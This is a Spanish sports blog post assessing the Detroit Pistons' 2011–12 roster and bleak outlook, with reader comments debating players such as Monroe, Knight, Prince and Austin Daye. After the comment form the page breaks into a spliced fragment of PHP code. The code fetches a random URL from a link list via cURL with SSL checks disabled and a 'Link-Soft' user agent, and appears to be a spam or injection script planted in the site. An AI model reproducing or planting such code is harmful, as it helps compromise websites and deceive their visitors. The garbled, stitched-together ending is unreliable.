Detroit Pistons: Ningún objetivo real

14 de January de 2012 por telekoman

Lamentablemente para los aficionados de los Pistons no hay nada en juego este año más allá que algunos de sus jóvenes jugadores vayan acumulando partidos y experiencia. No hay ninguna posibilidad de que el equipo visite la post-temporada, salvo cataclismo mayúsculo de muchos equipos de la Conferencia Este. Pero llamadme iluso si queréis, yo sigo pensando que el equipo tiene mimbres suficientes si se consigue pescar algo interesante en el draft del año que viene.

La temporada pasada resultó excesivamente convulsa, con jugadores desmotivados y rebeldes, entrenadores que no supieron sacar partido a sus jugadores y lesiones que marcaron mucho la temporada. Este año el ambiente parece ligeramente diferente. Ya no está Rip Hamilton, que tras resolver su salida de Detroit fichó por los Bulls y al que se le echará de menos en el Auburn Hills. Tampoco estárá Tracy McGrady, aunque de este no creo que nadie se acuerde.

Sí estará Rodney Stuckey, que tras firmar su renovación jugará su cuarta temporada en el equipo de Detroit. Su papel es clave en el equipo, si bien la decepcionante temporada pasada ha hecho que surjan ciertas dudas entre los aficionados. La adquisición de Brandon Knight en el draft de este año podría indicar que se quiere forzar a Stuckey a que incremente sus prestaciones. El rookie no le ha suplido mal mientras ha estado lesionado, así que debe espabilar. Will Bynum también jugará sus 15-20 minutos como base.

Tras la salida de Hamilton el puesto de SG parece tener un poseedor claro. Vistos los primeros partidos de la temporada, parece evidente que el inglés Ben Gordon está dispuesto a olvidar las dos horrorosas temporadas anteriores y centrarse lo suficiente como para rentabilizar los más de 11 millones que va a cobrar este año. Quizás este sea su año teniendo en cuenta que al finalizar la temporada está el premio de Londres 2012. Damien Wilkins podría tener minutos, aunque es más probable que Stuckey, Gordon y Knight ocupen la mayoría de minutos las posiciones de 1 y 2.

Otro que renovó por Detroit, Tayshaun Prince, jugará su 9 temporada en la NBA ocupando la posición de 3. Su misión es doble. Por un lado mantener las estadísticas y mentalidad de años anteriores y por otro lado hacer que Austin Daye (su clon natural y que tanto está decepcionando) aumente sus prestaciones.

Jonas Jerebko se postula como el 4 titular del equipo o al menos así ha sido en los 10 primeros encuentros. El sueco se perdió su segundo año de carrera por una rotura de su talón de aquiles justo cuando mejor lo estaba haciendo. Esta temporada ha reaparecido con fuerza, aunque en los últimos partidos ha bajado algo sus prestaciones. Ofrece trabajo, rebotes y cerca de 10 puntos por partido.  Junto a él, Jason Maxiell que aportará minutos e intensidad, pero no mucho más. Nos queda la incógnita Charlie Villanueva. Creo sinceramente que pocos jugadores han conseguido desilusionar tanto a los aficionados de los Pistons. Y todavía le quedan fijos este año y el que viene, más una player option de la que me voy a reservar la opinión. Ha jugado únicamente 3 minutos en lo que va de año, teniendo en cuenta suspensiones, lesiones y sobre todo falta de ganas.

La joya de la corona para el futuro cercano es sin duda Greg Monroe. Sin dar mucho que hablar, despacito y con buena letra, Monroe es el tercer center puro con mayor eficiencia de la liga, detras de Howard y Love. Ha incrementado todos sus números de la temporada anterior y es la luz al final del tunel. Junto a él un viejo rockero, Ben Wallace, que ya en el último año de su carrera, le puede dar algún minuto de descanso, aunque los años se le notan y mucho.

A Detroit le queda un camino largo y lleno de dificultades. Esta temporada se optará sin duda por el dudoso título de ser el peor equipo de la NBA. Pero si la lotería es benévola con el equipo y se pudiese optar a un 3 importante, el futuro sería algo más luminoso.

Quinteto: Rodney Stuckey, Ben Gordon, Tayshaun Prince, Jonas Jerebko, Greg Monroe.
6º hombre: Brandon Knight.

Previsión: Fuera de Playoffs y luchando por el título de Peor Equipo del Año.

Comenta

10 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Pues sí, trístemente están en su peor momento como equipo en muchísimos años. Ningún objetivo real, imposible titular mejor el análisis de este equipo. A mí me da mucha pena ver a Prince arrastrándose por la cancha, con lo que ha sido este tío. Inclusive, Ben Wallace, aquel Ben Wallace que daba un miedo del copón antaño, ahora parece que midiese cinco centímetros menos, y tiene como la mitad de brazo que en su mejor momento. Detroit está viviendo la típica cuesta abajo de un equipo que no supo desintegrarse en su momento. Quisieron seguir etérnamente aspirando a los playoffs con gente muy veterana, y no sé a santo de qué comprometieron la contratación de gordon teniendo que pagar 11 kilos a un tío sin futuro alguno. Como bien dices, en la medida que sepan echar a toda la morralla, es decir, Gordon y Prince, principalmente, que estuvieron en el mal royismo del año pasado, tendrán algo de futuro. Knight, Jerebko y Monroe son la base de ese futuro. Stuckey no sé muy bien si está o no comprometido con el equipo, pero podría formar una gran pareja de bases con Knight si se implica. Si no lo está, fuera también. Y nada más, realmente. Creo que van a ser últimos en el este, y eso es decir demasiado poco… que el draft les acompañe

      Citar

  2. melo15 dice:
    #2

    Bueno, a mi me parece increible la progresion de Monroe, vaya pedazo de jugador, y Jerebko es un buen ala-pivot, con bastantes recursos ofensivos, despues esta Knight, que si aprende a dirigir el equipo, puede ser all-star, y Stuckey no se quien es pero yo lo pondria de 6 hombre, para que juegue de base-escolta y asi que no corte la progresion de Knight

      Citar

  3. HeiNeKeN dice:
    #3

    No entiendo como Prince pudo renovar en lugar de irse a un equipo aspirante al anillo como hizo Battier.

    Este equipo debe centrarse en Monroe y poco a poco ir rodeandolo de buenos jugadores (como hizo Orlando con Howard).

      Citar

  4. melo15 dice:
    #4

    Ya pero esque Monroe no creo que llegue a ser Howard

      Citar

  5. kantonyo dice:
    #5

    Coincido con la gran decepción de Austin Daye. No vino con grandes números de la NCAA y ni siquiera hizo un gran torneo, sus cualidades que le llevaron al puesto 15 del draft eran su elegancia, su estilizada figura y buen lanzamiento exterior, apuntaban a un gran potencial de mejora.

    Llevo unos cinco años siguiendo la NCAA con gran interés, y una cosa estoy aprendiendo con el paso de los años sobre los jugadores del draft, y es que si un jugador no muestra carácter y personalidad en la NCAA, por mucho talento que disponga es muy difícil que luego triunfe en la NBA : Austin Daye, Wesley Johnson, Hasheem Thabeet, Joe Alexander son algunos de los ejemplos con sirope de fresa en las venas.

      Citar

  6. melo15 dice:
    #6

    No entiendo lo cel caracter, Wes con Syracuse fundia, y era favorito para la Final Four

      Citar

  7. portu dice:
    #7

    Muy acertado, Teleko, este equipo sólo puede buscar este año el mejor nº posible de lotería. Eligieron bien en los drafts pasados, y en estos 2 últimos años el fallo fue no desprenderse antes de Hamilton y renovar a Prince, que sigue siendo un jugador aceptable, pero no sé si les sirve para algo a estos Pistons, además, físicamente juega medio cojo, aquel tío elástico q defendía y atacaba como una fiera pese a parecer un spaguetti se ha quedado en un jugador de los q va a cámara lenta. En cuanto al quinteto titular, una vez recuperado Stuckey, ha seguido jugando de 1 titular B. Knight, de 1 suplente W. Bynum, salvo el último partido q estaba lesionado, de 2 titular Gordon y de 2 suplente y 6º hombre Stuckey (aunque contra GSW tb jugó algo de base por la lesión de Bynum). A Stuckey (supongo q en parte por la lesión) se le ve muy rígido jugando, algo falto de ritmo, velocidad, salto,… pero sí se le nota cómodo jugando de 2, sin el peso de llevar el equipo. En cuanto a Knight, está mejorando poquito a poco varias cosas, creo q ahora está centrado en el tema pérdidas, q su principio de temporada fue desastroso en ese sentido, su selección de tiro es bastante buena para ser rookie y luego le falta encontrar asistencias, q no es q no mueva la bola bien, pero es q no está encontrando el pase de canasta. Tiene buena pinta y no se arruga. Y luego Monroe, muchísima clase, lástima q algo corto de físico, sobretodo en cuanto a salto y velocidad, también tiene un buen tirito… con Jerebko se entiende bien en ataque, pero en defensa les falta presencia en la zona, en su último partido, por poner un ejemplo, D. Lee campaba a sus anchas… lo de Maxiell y Ben Wallace es una broma al baloncesto. Y lo de Daye, pues lo q habéis dicho, sin sangre… no sale concentrado, pierde balones de manos de mantequilla, no es agresivo ni en defensa ni en ataque… la calidad se le presume, veremos si muestra algo, pero parece q le ha afectado la renovación de Prince.

      Citar

  8. kantonyo dice:
    #8

    melo15:
    No entiendo lo cel caracter, Wes con Syracuse fundia, y era favorito para la Final Four

    Wes con Syracuse tuvo una temporada con altibajos, y es verdad que a mi me convenció y me gustaba, y confiaba en él. Recuerdo su partidazo contra Gonzaga con 31 puntos, 14 rebotes (4-6 en 3p)

    Pero cuando hablo de carácter, me refiero a que es un “empanao” como dicen en mi barrio. A ver si espabila!!!

      Citar

  9. portu dice:
    #9

    Está jugando mejor de 3 y sobretodo si comparte minutos con Ricky en el campo. No es lo mismo los triples q se tiraba antes q cómo los tira ahora y cerca del aro es un SF muy potente en cuanto a salto y envergadura. Todavía es pronto, yo creo q tiene mucho margen de progresión… si no vuelven al mismo esquema cuando regrese Beasley, claro.

      Citar

  10. melo15 dice:
    #10

    Wesley Johnson, tuvo tamben actuaciones memorables en el Coach vs Cancer, aunque en el March Madness se arrugo.
    Pero repito, tiene un fisico brutal, que deberia aprovechar mas de lo que lo hace, menos tirar y mas penetrar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>